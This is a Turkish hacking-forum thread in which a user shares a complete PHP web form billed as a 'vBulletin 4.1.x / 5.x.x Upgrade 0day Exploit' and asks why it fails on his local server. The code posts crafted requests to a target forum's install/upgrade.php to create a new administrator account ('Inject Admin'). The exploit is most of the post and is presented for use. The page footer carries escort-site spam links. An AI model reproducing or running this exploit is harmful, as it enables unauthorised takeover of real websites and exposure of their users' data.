⚠️ ÖNEMLİ DUYURU — KİŞİSEL VERİ VE YASADIŞI PAYLAŞIMLAR

Forumda kişisel bilgi (ad, adres, telefon vb.) veya yasa dışı içerik paylaşımı kesinlikle yasaktır. Bu tür paylaşımlar KVKK ve ilgili yasalar gereği suç teşkil eder.

Paylaşım yapan kullanıcıların hesapları kalıcı olarak kapatılacak ve resmî makamlara bildirilecektir. Forum yönetimi, yasal zorunluluklar gereği IP ve oturum kayıtlarını saklamaktadır.

Lütfen gizliliğe ve topluluk kurallarına dikkat ediniz. — Ajanlar.Org Yönetimi

Çalıştırabilen var mı ? [Çözüldü]

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Er0in

Özel Üye
Katılım
21 Eyl 2012
Mesajlar
1,386
Tepkime puanı
0
Puanları
0
Yaş
29
Web sitesi
serdenetwork.com
Kod:
<h1>vBulletin  4.1.x  /  5.x.x   Upgrade   0day  Exploit</h1>
<p>Created by: Boxhead</p>
<p>Found on: 08/22/2013</p>
<p>Website: <a href="http://belegit.net" target="_blank">http://belegit.net</a></p>
<br>
<?php
//extract data from the post
if(isset($_POST['submit'])){
extract($_POST);

//set POST variables
$url = $_POST['url'];
$fields = array(
                        'ajax' => urlencode('1'),
                        'version' => urlencode('install'),
                        'checktable' => urlencode('false'),
                        'firstrun' => urlencode('false'),
                        'step' => urlencode('7'),
                        'startat' => urlencode('0'),
                        'only' => urlencode('false'),
                        'customerid' => urlencode($_POST['customerid']),
                        'options[skiptemplatemerge]' => urlencode('0'),
                        'response' => urlencode('yes'),
                        'htmlsubmit' => urlencode('1'),
                        'htmldata[username]' => urlencode($_POST['username']),
                        'htmldata[password]' => urlencode($_POST['password']),
                        'htmldata[confirmpassword]' => urlencode($_POST['password']),
                        'htmldata[email]' => urlencode($_POST['email'])
                );

//url-ify the data for the POST
foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
rtrim($fields_string, '&');

//open connection
$ch = curl_init();

//set the url, number of POST vars, POST data
curl_setopt($ch,CURLOPT_URL, $url);
curl_setopt($ch,CURLOPT_POST, count($fields));
curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );

//execute post
$result = curl_exec($ch);

//close connection
curl_close($ch);
exit();
}
?>
<center>
<form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>">
<span>Example:http://test.com/forum/install/upgrade.php</span><br>
  <span>Website:</span>
    <input name="url" type="text" tabindex="1" size="60" />
    <br>
    <span>Customer ID:</span>
    <input name="customerid" type="text" tabindex="2" size="40" />
    <br>
    <span>Username:</span>
    <input name="username" type="text" tabindex="3" size="40" />
    <br>
    <span>Password:</span>
    <input name="password" type="text" tabindex="4" size="40" />
    <br>
    <span>Email:</span>
    <input name="email" type="text" tabindex="5" maxlength="40" />
    
<input name="submit" type="submit" value="Inject Admin">
</form>
</center>

Bu scripti localhost'unda çalıştırabilen var mı ? vbulletin 4.x.x ve 5.x.x versiyonlarını upgrade'liyor :D ben locale atınca bozuk çıkıyor :D Appserver var başka scriptler çalışıyor ama bu bende sorun çıkartıyor :D b3yaz'da YnR! yoldaşım falan hepsinde çalışıyor :D bende bozuk :D
 

Er0in

Özel Üye
Katılım
21 Eyl 2012
Mesajlar
1,386
Tepkime puanı
0
Puanları
0
Yaş
29
Web sitesi
serdenetwork.com
Evet kardşlk Sağol :) +rep'ledim :)
 

G3nzo

Özel Üye
Katılım
20 Eyl 2012
Mesajlar
1,994
Tepkime puanı
0
Puanları
36
Sorun halloldumu ?
 
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

mersin escort mersin e ticaret bodrum escort ataköy escort çeşme escort konya escort konya escort bodrum escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sapanca escort
Üst
Copyright® Ajanlar.org 2012